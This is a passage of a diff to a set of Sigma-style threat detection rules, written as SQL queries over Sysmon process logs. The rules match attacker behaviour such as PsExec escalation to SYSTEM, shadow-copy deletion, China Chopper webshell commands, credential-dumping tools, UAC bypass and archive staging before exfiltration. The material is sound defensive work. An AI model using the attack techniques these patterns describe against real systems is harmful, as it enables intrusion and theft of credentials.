PsExec and PAExec to escalate a command line to LOCAL_SYSTEM rights", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.resource_development", + "attack.t1587.001" ], "falsepositives": [ - "Legitimate, non-default assistive technology applications execution" + "Admins that use PsExec or PAExec to escalate to the SYSTEM account for maintenance purposes (rare)", + "Users that debug Microsoft Intune issues using the commands mentioned in the official documentation; see https://learn.microsoft.com/en-us/mem/intune/apps/intune-management-extension" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%AtBroker.exe' ESCAPE '\\' AND CommandLine LIKE '%start%' ESCAPE '\\') AND NOT ((CommandLine LIKE '%animations%' ESCAPE '\\' OR CommandLine LIKE '%audiodescription%' ESCAPE '\\' OR CommandLine LIKE '%caretbrowsing%' ESCAPE '\\' OR CommandLine LIKE '%caretwidth%' ESCAPE '\\' OR CommandLine LIKE '%colorfiltering%' ESCAPE '\\' OR CommandLine LIKE '%cursorscheme%' ESCAPE '\\' OR CommandLine LIKE '%filterkeys%' ESCAPE '\\' OR CommandLine LIKE '%focusborderheight%' ESCAPE '\\' OR CommandLine LIKE '%focusborderwidth%' ESCAPE '\\' OR CommandLine LIKE '%highcontrast%' ESCAPE '\\' OR CommandLine LIKE '%keyboardcues%' ESCAPE '\\' OR CommandLine LIKE '%keyboardpref%' ESCAPE '\\' OR CommandLine LIKE '%magnifierpane%' ESCAPE '\\' OR CommandLine LIKE '%messageduration%' ESCAPE '\\' OR CommandLine LIKE '%minimumhitradius%' ESCAPE '\\' OR CommandLine LIKE '%mousekeys%' ESCAPE '\\' OR CommandLine LIKE '%Narrator%' ESCAPE '\\' OR CommandLine LIKE '%osk%' ESCAPE '\\' OR CommandLine LIKE '%overlappedcontent%' ESCAPE '\\' OR CommandLine LIKE '%showsounds%' ESCAPE '\\' OR CommandLine LIKE '%soundsentry%' ESCAPE '\\' OR CommandLine LIKE '%stickykeys%' ESCAPE '\\' OR CommandLine LIKE '%togglekeys%' ESCAPE '\\' OR CommandLine LIKE '%windowarranging%' ESCAPE '\\' OR CommandLine LIKE '%windowtracking%' ESCAPE '\\' OR CommandLine LIKE '%windowtrackingtimeout%' ESCAPE '\\' OR CommandLine LIKE '%windowtrackingzorder%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '% -s cmd%' ESCAPE '\\' OR CommandLine LIKE '% /s cmd%' ESCAPE '\\' OR CommandLine LIKE '% -s -i cmd%' ESCAPE '\\' OR CommandLine LIKE '% /s /i cmd%' ESCAPE '\\' OR CommandLine LIKE '% /s -i cmd%' ESCAPE '\\' OR CommandLine LIKE '% -s /i cmd%' ESCAPE '\\' OR CommandLine LIKE '% -i -s cmd%' ESCAPE '\\' OR CommandLine LIKE '% /i /s cmd%' ESCAPE '\\' OR CommandLine LIKE '% -i /s cmd%' ESCAPE '\\' OR CommandLine LIKE '% /i -s cmd%' ESCAPE '\\' OR CommandLine LIKE '% -s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -s -i pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /s /i pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /s -i pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -s /i pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -i -s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /i /s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -i /s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /i -s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -s powershell%' ESCAPE '\\' OR CommandLine LIKE '% /s powershell%' ESCAPE '\\' OR CommandLine LIKE '% -s -i powershell%' ESCAPE '\\' OR CommandLine LIKE '% /s /i powershell%' ESCAPE '\\' OR CommandLine LIKE '% /s -i powershell%' ESCAPE '\\' OR CommandLine LIKE '% -s /i powershell%' ESCAPE '\\' OR CommandLine LIKE '% -i -s powershell%' ESCAPE '\\' OR CommandLine LIKE '% /i /s powershell%' ESCAPE '\\' OR CommandLine LIKE '% -i /s powershell%' ESCAPE '\\' OR CommandLine LIKE '% /i -s powershell%' ESCAPE '\\') AND (CommandLine LIKE '%psexec%' ESCAPE '\\' OR CommandLine LIKE '%paexec%' ESCAPE '\\' OR CommandLine LIKE '%accepteula%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_susp_atbroker.yml" + "filename": "proc_creation_win_sysinternals_psexec_paexec_escalate_system.yml" }, { - "title": "Rhadamanthys Stealer Module Launch Via Rundll32.EXE", - "id": "5cdbc2e8-86dd-43df-9a1a-200d4745fba5", + "title": "Suspicious TSCON Start as SYSTEM", + "id": "9847f263-4a81-424f-970c-875dab15b79b", "status": "experimental", - "description": "Detects the use of Rundll32 to launch an NSIS module that serves as the main stealer capability of Rhadamanthys infostealer, as observed in reports and samples in early 2023", - "author": "TropChaud", + "description": "Detects a tscon.exe start as LOCAL SYSTEM", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218.011" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'RUNDLL32.EXE' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\') AND CommandLine LIKE '%nsis\\_uns%' ESCAPE '\\' AND CommandLine LIKE '%PrintUIEntry%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\') AND Image LIKE '%\\\\tscon.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_malware_rhadamanthys_stealer_dll_launch.yml" + "filename": "proc_creation_win_tscon_localsystem.yml" }, { - "title": "DriverQuery.EXE Execution", - "id": "a20def93-0709-4eae-9bd2-31206e21e6b2", - "status": "experimental", - "description": "Detect usage of the \"driverquery\" utility. Which can be used to perform reconnaissance on installed drivers", - "author": "Nasreddine Bencherchali (Nextron Systems)", - "tags": [ - "attack.discovery" - ], + "title": "Password Provided In Command Line Of Net.EXE", + "id": "d4498716-1d52-438f-8084-4a603157d131", + "status": "test", + "description": "Detects a when net.exe is called with a password in the command line", + "author": "Tim Shelton (HAWK.IO)", "falsepositives": [ - "Legitimate use by third party tools in order to investigate installed drivers" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%driverquery.exe' ESCAPE '\\' OR OriginalFileName = 'drvqry.exe'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\') OR OriginalFileName IN ('net.exe', 'net1.exe')) AND (CommandLine LIKE '% use %' ESCAPE '\\' AND CommandLine LIKE '%:%\\\\\\*' ESCAPE '\\' AND CommandLine LIKE '%/USER:% %' ESCAPE '\\')) AND NOT ((CommandLine LIKE '% ' ESCAPE '\\')))" ], - "filename": "proc_creation_win_driverquery_usage.yml" + "filename": "proc_creation_win_net_use_password_plaintext.yml" }, { - "title": "HackTool - Htran/NATBypass Execution", - "id": "f5e3b62f-e577-4e59-931e-0a15b2b94e1e", - "status": "experimental", - "description": "Detects exeuctable names or flags used by Htran or Htran-like tools (e.g. NATBypass)", - "author": "Florian Roth (Nextron Systems)", + "title": "Potential CommandLine Path Traversal Via Cmd.EXE", + "id": "087790e3-3287-436c-bccf-cbd0184a7db1", + "status": "test", + "description": "Detects potential path traversal attempt via cmd.exe. Could indicate possible command/argument confusion/hijacking", + "author": "xknow @xknow_infosec, Tim Shelton", "tags": [ - "attack.command_and_control", - "attack.t1090", - "attack.s0040" + "attack.execution", + "attack.t1059.003" ], "falsepositives": [ - "Unknown" + "Java tools are known to produce false-positive when loading libraries" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\htran.exe' ESCAPE '\\' OR Image LIKE '%\\\\lcx.exe' ESCAPE '\\') OR (CommandLine LIKE '%.exe -tran %' ESCAPE '\\' OR CommandLine LIKE '%.exe -slave %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ParentImage LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'cmd.exe') AND ((ParentCommandLine LIKE '%/c%' ESCAPE '\\' OR ParentCommandLine LIKE '%/k%' ESCAPE '\\' OR ParentCommandLine LIKE '%/r%' ESCAPE '\\') OR (CommandLine LIKE '%/c%' ESCAPE '\\' OR CommandLine LIKE '%/k%' ESCAPE '\\' OR CommandLine LIKE '%/r%' ESCAPE '\\')) AND (ParentCommandLine = '/../../' OR CommandLine LIKE '%/../../%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%\\\\Tasktop\\\\keycloak\\\\bin\\\\/../../jre\\\\bin\\\\java%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hktl_htran_or_natbypass.yml" + "filename": "proc_creation_win_cmd_path_traversal.yml" }, { - "title": "Potential Recon Activity Using DriverQuery.EXE", - "id": "9fc3072c-dc8f-4bf7-b231-18950000fadd", + "title": "Use Icacls to Hide File to Everyone", + "id": "4ae81040-fc1c-4249-bfa3-938d260214d9", "status": "experimental", - "description": "Detect usage of the \"driverquery\" utility to perform reconnaissance on installed drivers", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detect use of icacls to deny access for everyone in Users folder sometimes used to hide malicious files", + "author": "frack113", "tags": [ - "attack.discovery" + "attack.defense_evasion", + "attack.t1564.001" ], "falsepositives": [ - "Unknown" + "Legitimate use" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%driverquery.exe' ESCAPE '\\' OR OriginalFileName = 'drvqry.exe') AND ((ParentImage LIKE '%\\\\cmd.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wscript.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\cscript.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\mshta.exe' ESCAPE '\\') OR (ParentImage LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR ParentImage LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR ParentImage LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'iCACLS.EXE' OR Image LIKE '%\\\\icacls.exe' ESCAPE '\\') AND (CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%/deny%' ESCAPE '\\' AND CommandLine LIKE '%S-1-1-0:%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_driverquery_recon.yml" + "filename": "proc_creation_win_icacls_deny.yml" }, { - "title": "Powershell Inline Execution From A File", - "id": "ee218c12-627a-4d27-9e30-d6fb2fe22ed2", - "status": "experimental", - "description": "Detects inline execution of PowerShell code from a file", - "author": "frack113", + "title": "PUA - Mouse Lock Execution", + "id": "c9192ad9-75e5-43eb-8647-82a0a5b493e3", + "status": "test", + "description": "In Kaspersky's 2020 Incident Response Analyst Report they listed legitimate tool \"Mouse Lock\" as being used for both credential access and collection in security incidents.", + "author": "Cian Heasley", + "tags": [ + "attack.credential_access", + "attack.collection", + "attack.t1056.002" + ], "falsepositives": [ - "Unknown" + "Legitimate uses of Mouse Lock software" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%iex %' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Expression %' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Command %' ESCAPE '\\' OR CommandLine LIKE '%icm %' ESCAPE '\\') AND (CommandLine LIKE '%cat %' ESCAPE '\\' OR CommandLine LIKE '%get-content %' ESCAPE '\\' OR CommandLine LIKE '%type %' ESCAPE '\\') AND CommandLine LIKE '% -raw%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Product LIKE '%Mouse Lock%' ESCAPE '\\' OR Company LIKE '%Misc314%' ESCAPE '\\' OR CommandLine LIKE '%Mouse Lock\\_%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_exec_data_file.yml" + "filename": "proc_creation_win_pua_mouselock_execution.yml" }, { - "title": "Renamed PsExec Service Execution", - "id": "51ae86a2-e2e1-4097-ad85-c46cb6851de4", + "title": "Chopper Webshell Process Pattern", + "id": "fa3c117a-bc0d-416e-a31b-0c0e80653efb", "status": "experimental", - "description": "Detects suspicious launch of a renamed version of the PSEXESVC service with, which is not often used by legitimate administrators", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects patterns found in process executions cause by China Chopper like tiny (ASPX) webshells", + "author": "Florian Roth (Nextron Systems), MSTI (query)", "tags": [ - "attack.execution" + "attack.persistence", + "attack.t1505.003", + "attack.t1018", + "attack.t1033", + "attack.t1087" ], "falsepositives": [ - "Legitimate administrative tasks" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND OriginalFileName = 'psexesvc.exe' AND NOT (Image LIKE 'C:\\\\Windows\\\\PSEXESVC.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\w3wp.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\w3wp.exe' ESCAPE '\\') AND (CommandLine LIKE '%&ipconfig&echo%' ESCAPE '\\' OR CommandLine LIKE '%&quser&echo%' ESCAPE '\\' OR CommandLine LIKE '%&whoami&echo%' ESCAPE '\\' OR CommandLine LIKE '%&c:&echo%' ESCAPE '\\' OR CommandLine LIKE '%&cd&echo%' ESCAPE '\\' OR CommandLine LIKE '%&dir&echo%' ESCAPE '\\' OR CommandLine LIKE '%&echo [E]%' ESCAPE '\\' OR CommandLine LIKE '%&echo [S]%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_renamed_sysinternals_psexec_service.yml" + "filename": "proc_creation_win_webshell_chopper.yml" }, { - "title": "Potential Execution of Sysinternals Tools", - "id": "7cccd811-7ae9-4ebe-9afd-cb5c406b824b", - "status": "experimental", - "description": "Detects command lines that contain the 'accepteula' flag which could be a sign of execution of one of the Sysinternals tools", - "author": "Markus Neis", + "title": "Files Added To An Archive Using Rar.EXE", + "id": "6f3e2987-db24-4c78-a860-b4f4095a7095", + "status": "test", + "description": "Detects usage of \"rar\" to add files to an archive for potential compression. An adversary may compress data (e.g. sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network.", + "author": "Timur Zinniatullin, E.M. Anhaus, oscd.community", "tags": [ - "attack.resource_development", - "attack.t1588.002" + "attack.collection", + "attack.t1560.001" ], "falsepositives": [ - "Legitimate use of SysInternals tools", - "Programs that use the same command line flag" + "Highly likely if rar is a default archiver in the monitored environment." ], "level": "low", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '% -accepteula%' ESCAPE '\\' OR CommandLine LIKE '% /accepteula%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\rar.exe' ESCAPE '\\' AND CommandLine LIKE '% a %' ESCAPE '\\')" ], - "filename": "proc_creation_win_sysinternals_eula_accepted.yml" + "filename": "proc_creation_win_rar_compress_data.yml" }, { - "title": "Regsvr32 Command Line Without DLL", - "id": "50919691-7302-437f-8e10-1fe088afa145", + "title": "Findstr Launching .lnk File", + "id": "33339be3-148b-4e16-af56-ad16ec6c7e7b", "status": "test", - "description": "Detects a regsvr.exe execution that doesn't contain a DLL in the command line", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects usage of findstr to identify and execute a lnk file as seen within the HHS redirect attack", + "author": "Trent Liffick", "tags": [ "attack.defense_evasion", - "attack.t1574", - "attack.execution" + "attack.t1036", + "attack.t1202", + "attack.t1027.003" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND NOT ((CommandLine LIKE '%.dll%' ESCAPE '\\' OR CommandLine LIKE '%.ocx%' ESCAPE '\\' OR CommandLine LIKE '%.cpl%' ESCAPE '\\' OR CommandLine LIKE '%.ax%' ESCAPE '\\' OR CommandLine LIKE '%.bav%' ESCAPE '\\' OR CommandLine LIKE '%.ppl%' ESCAPE '\\'))) AND NOT (CommandLine = '')) AND NOT (CommandLine = ''))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\findstr.exe' ESCAPE '\\' OR OriginalFileName = 'FINDSTR.EXE') AND CommandLine LIKE '%.lnk' ESCAPE '\\')" ], - "filename": "proc_creation_win_regsvr32_no_dll.yml" + "filename": "proc_creation_win_findstr_lnk.yml" }, { - "title": "SyncAppvPublishingServer Execute Arbitrary PowerShell Code", - "id": "fbd7c32d-db2a-4418-b92c-566eb8911133", + "title": "Reg Add Suspicious Paths", + "id": "b7e2a8d4-74bb-4b78-adc9-3f92af2d4829", "status": "experimental", - "description": "Executes arbitrary PowerShell code using SyncAppvPublishingServer.exe.", - "author": "frack113", + "description": "Detects when an adversary uses the reg.exe utility to add or modify new keys or subkeys", + "author": "frack113, Nasreddine Bencherchali", "tags": [ "attack.defense_evasion", - "attack.t1218" + "attack.t1112", + "attack.t1562.001" ], "falsepositives": [ - "App-V clients" + "Rare legitimate add to registry via cli (to these locations)" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\SyncAppvPublishingServer.exe' ESCAPE '\\' OR OriginalFileName = 'syncappvpublishingserver.exe') AND CommandLine LIKE '%\"n; %' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND (CommandLine LIKE '%\\\\AppDataLow\\\\Software\\\\Microsoft\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Policies\\\\Microsoft\\\\Windows\\\\OOBE%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Policies\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon%' ESCAPE '\\' OR CommandLine LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\Currentversion\\\\Winlogon%' ESCAPE '\\' OR CommandLine LIKE '%\\\\CurrentControlSet\\\\Control\\\\SecurityProviders\\\\WDigest%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Microsoft\\\\Windows Defender\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_syncappvpublishingserver_execute_psh.yml" + "filename": "proc_creation_win_reg_susp_paths.yml" }, { - "title": "Shadow Copies Deletion Using Operating Systems Utilities", - "id": "c947b146-0abc-4c87-9c64-b17e9d7274a2", - "status": "stable", - "description": "Shadow Copies deletion using operating systems utilities", - "author": "Florian Roth (Nextron Systems), Michael Haag, Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community, Andreas Hunkeler (@Karneades)", - "tags": [ - "attack.defense_evasion", - "attack.impact", - "attack.t1070", - "attack.t1490" - ], + "title": "Potential Exploitation Attempt Of Undocumented WindowsServer RCE", + "id": "6d5b8176-d87d-4402-8af4-53aee9db7b5d", + "status": "experimental", + "description": "Detects potential exploitation attempt of undocumented Windows Server Pre Auth Remote Code Execution (RCE)", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali", "falsepositives": [ - "Legitimate Administrator deletes Shadow Copies using operating systems utilities for legitimate reason", - "LANDesk LDClient Ivanti-PSModule (PS EncodedCommand)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\vssadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\diskshadow.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll', 'wmic.exe', 'VSSADMIN.EXE', 'diskshadow.exe')) AND (CommandLine LIKE '%shadow%' ESCAPE '\\' AND CommandLine LIKE '%delete%' ESCAPE '\\')) OR ((Image LIKE '%\\\\wbadmin.exe' ESCAPE '\\' OR OriginalFileName = 'WBADMIN.EXE') AND (CommandLine LIKE '%delete%' ESCAPE '\\' AND CommandLine LIKE '%catalog%' ESCAPE '\\' AND CommandLine LIKE '%quiet%' ESCAPE '\\'))) OR ((Image LIKE '%\\\\vssadmin.exe' ESCAPE '\\' OR OriginalFileName = 'VSSADMIN.EXE') AND (CommandLine LIKE '%resize%' ESCAPE '\\' AND CommandLine LIKE '%shadowstorage%' ESCAPE '\\' AND (CommandLine LIKE '%unbounded%' ESCAPE '\\' OR CommandLine LIKE '%/MaxSize=%' ESCAPE '\\')))))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\svchost.exe' ESCAPE '\\' AND Image LIKE '%\\\\svchost.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%-k DHCPServer%' ESCAPE '\\' AND CommandLine LIKE '%-k DHCPServer%' ESCAPE '\\' AND (User LIKE '%NETWORK SERVICE%' ESCAPE '\\' OR User LIKE '%NETZWERKDIENST%' ESCAPE '\\' OR User LIKE '%SERVIZIO DI RETE%' ESCAPE '\\' OR User LIKE '%SERVICIO DE RED%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_shadow_copies_deletion.yml" + "filename": "proc_creation_win_exploit_other_win_server_undocumented_rce.yml" }, { - "title": "DumpMinitool Usage", - "id": "dee0a7a3-f200-4112-a99b-952196d81e42", + "title": "Logged-On User Password Change Via Ksetup.EXE", + "id": "c9783e20-4793-4164-ba96-d9ee483992c4", "status": "experimental", - "description": "Detects the use of \"DumpMinitool.exe\" a tool bundled with Visual Studio and DotNTET", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects password change for the logged-on user's via \"ksetup.exe\"", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1036", - "attack.t1003.001" + "attack.execution" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\DumpMinitool.exe' ESCAPE '\\' OR OriginalFileName = 'DumpMinitool.exe') OR (CommandLine LIKE '% --processId %' ESCAPE '\\' AND CommandLine LIKE '% --dumpType Full%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\ksetup.exe' ESCAPE '\\' OR OriginalFileName = 'ksetup.exe') AND CommandLine LIKE '% /ChangePassword %' ESCAPE '\\')" ], - "filename": "proc_creation_win_dumpminitool_execution.yml" + "filename": "proc_creation_win_ksetup_password_change_user.yml" }, { - "title": "HackTool - SecurityXploded Execution", - "id": "7679d464-4f74-45e2-9e01-ac66c5eb041a", - "status": "stable", - "description": "Detects the execution of SecurityXploded Tools", - "author": "Florian Roth (Nextron Systems)", + "title": "Suspicious Greedy Compression Using Rar.EXE", + "id": "afe52666-401e-4a02-b4ff-5d128990b8cb", + "status": "experimental", + "description": "Detects RAR usage that creates an archive from a suspicious folder, either a system folder or one of the folders often used by attackers for staging purposes", + "author": "X__Junior (Nextron Systems), Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1555" + "attack.execution", + "attack.t1059" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Company = 'SecurityXploded' OR Image LIKE '%PasswordDump.exe' ESCAPE '\\' OR OriginalFileName LIKE '%PasswordDump.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\rar.exe' ESCAPE '\\' OR Description = 'Command line RAR' OR (CommandLine LIKE '%.exe a %' ESCAPE '\\' OR CommandLine LIKE '% a -m%' ESCAPE '\\')) AND (CommandLine LIKE '% -hp%' ESCAPE '\\' AND CommandLine LIKE '% -r %' ESCAPE '\\' AND (CommandLine LIKE '% C:\\\\\\*.%' ESCAPE '\\' OR CommandLine LIKE '% C:\\\\\\\\\\*.%' ESCAPE '\\' OR CommandLine LIKE '% C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '% \\%public\\%%' ESCAPE '\\' OR CommandLine LIKE '% C:\\\\Windows\\\\%' ESCAPE '\\' OR CommandLine LIKE '% C:\\\\PerfLogs\\\\%' ESCAPE '\\' OR CommandLine LIKE '% C:\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '% C:\\\\$Recycle.bin\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hktl_secutyxploded.yml" + "filename": "proc_creation_win_rar_susp_greedy_compression.yml" }, { - "title": "Abusing Print Executable", - "id": "bafac3d6-7de9-4dd9-8874-4a1194b493ed", + "title": "UAC Bypass Using Windows Media Player - Process", + "id": "0058b9e5-bcd7-40d4-9205-95ca5a16d7b2", "status": "test", - "description": "Attackers can use print.exe for remote file copy", - "author": "Furkan CALISKAN, @caliskanfurkan_, @oscd_initiative", + "description": "Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1218" + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\print.exe' ESCAPE '\\' AND CommandLine LIKE 'print%' ESCAPE '\\' AND CommandLine LIKE '%/D%' ESCAPE '\\' AND CommandLine LIKE '%.exe%' ESCAPE '\\') AND NOT (CommandLine LIKE '%print.exe%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE 'C:\\\\Program Files\\\\Windows Media Player\\\\osk.exe' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System')) OR (Image LIKE 'C:\\\\Windows\\\\System32\\\\cmd.exe' ESCAPE '\\' AND ParentCommandLine LIKE '\"C:\\\\Windows\\\\system32\\\\mmc.exe\" \"C:\\\\Windows\\\\system32\\\\eventvwr.msc\" /s' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))))" ], - "filename": "proc_creation_win_print_remote_file_copy.yml" + "filename": "proc_creation_win_uac_bypass_wmp.yml" }, { - "title": "Set Suspicious Files as System Files Using Attrib.EXE", - "id": "efec536f-72e8-4656-8960-5e85d091345b", + "title": "HackTool - Inveigh Execution", + "id": "b99a1518-1ad5-4f65-bc95-1ffff97a8fd0", "status": "experimental", - "description": "Detects the usage of attrib with the \"+s\" option to set scripts or executables located in suspicious locations as system files to hide them from users and make them unable to be deleted with simple rights. The rule limits the search to specific extensions and directories to avoid FPs\n", + "description": "Detects the use of Inveigh a cross-platform .NET IPv4/IPv6 machine-in-the-middle tool", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1564.001" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ - "Unknown" + "Very unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\attrib.exe' ESCAPE '\\' OR OriginalFileName = 'ATTRIB.EXE') AND CommandLine LIKE '% +s%' ESCAPE '\\' AND (CommandLine LIKE '% \\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR CommandLine 